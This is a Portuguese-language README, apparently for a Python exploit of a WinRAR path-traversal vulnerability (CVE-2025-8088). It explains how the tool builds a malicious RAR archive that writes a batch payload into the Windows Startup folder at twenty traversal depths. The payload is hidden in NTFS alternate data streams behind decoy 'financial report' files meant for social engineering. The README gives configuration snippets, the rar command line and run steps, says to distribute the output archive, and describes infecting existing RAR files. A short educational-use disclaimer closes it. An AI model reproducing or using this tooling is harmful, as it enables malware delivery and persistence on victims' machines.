
Explora sistemas usando WinRAR antigo sem saber o nome de usuário (ao contrário de outros projetos)


Este script Python explora uma vulnerabilidade de path traversal (CVE-2025-8088) no WinRAR para implantar payloads na pasta de inicialização do Windows usando múltiplas profundidades de caminho relativo. O exploit cria um arquivo RAR malicioso que, ao ser extraído, escreve payloads na pasta de inicialização da vítima em várias profundidades de diretório.
O script cria múltiplos arquivos isca (20 por padrão), cada um configurado para percorrer um número diferente de diretórios pai:
NUM_DEPTHS = 20 # Number of different traversal depths
Cada arquivo usa uma profundidade de caminho diferente:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 times) \Startup\payload.bat
✅ Garante que, independentemente de onde a vítima extraia o arquivo (Área de Trabalho, Documentos, Downloads ou pastas aninhadas), pelo menos um payload alcançará a pasta de inicialização.
Os arquivos isca contêm texto genérico por padrão, mas devem ser personalizados para engenharia social realista:
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
Por que alterar o conteúdo da isca?
O payload é um script batch simples por padrão, mas pode ser substituído por qualquer executável:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
Localização do payload:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
O arquivo RAR malicioso final é salvo como:
OUT_RAR = "exploit.rar"
Esta geração de exploit requer um ambiente Windows por vários motivos:
Dependência de Alternate Data Streams (ADS)
Recurso exclusivo do NTFS usado para anexar payloads:
ads_path = f"{decoy}:{placeholder}" # Windows-specific NTFS syntax
Requisito do Executável WinRAR
Usa a CLI do WinRAR no Windows:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
Compatibilidade da Estrutura de Caminho
Visa caminhos específicos do Windows:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
Execução do Payload
Gera arquivos batch do Windows:
@echo off
start /B notepad.exe
Personalize a configuração:
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # More convincing names
Execute o script:
python CVE-2025-8088.py
Distribua o arquivo de saída:
exploit.rarEsta versão do código simplesmente permite que você execute algo como
python3 infect_premade_rarfiles.py website_backup.rar
Ele extrairá todos os arquivos, injetará aqueles que puder, como .txt, srt, sql (Nem todos os tipos de arquivo funcionam) e, em seguida, criará o arquivo rar pronto para execução.
⚠️ Esta ferramenta é apenas para fins educacionais e de pesquisa em segurança.
Nunca a utilize contra sistemas sem permissão explícita. O uso não autorizado é ilegal e antiético.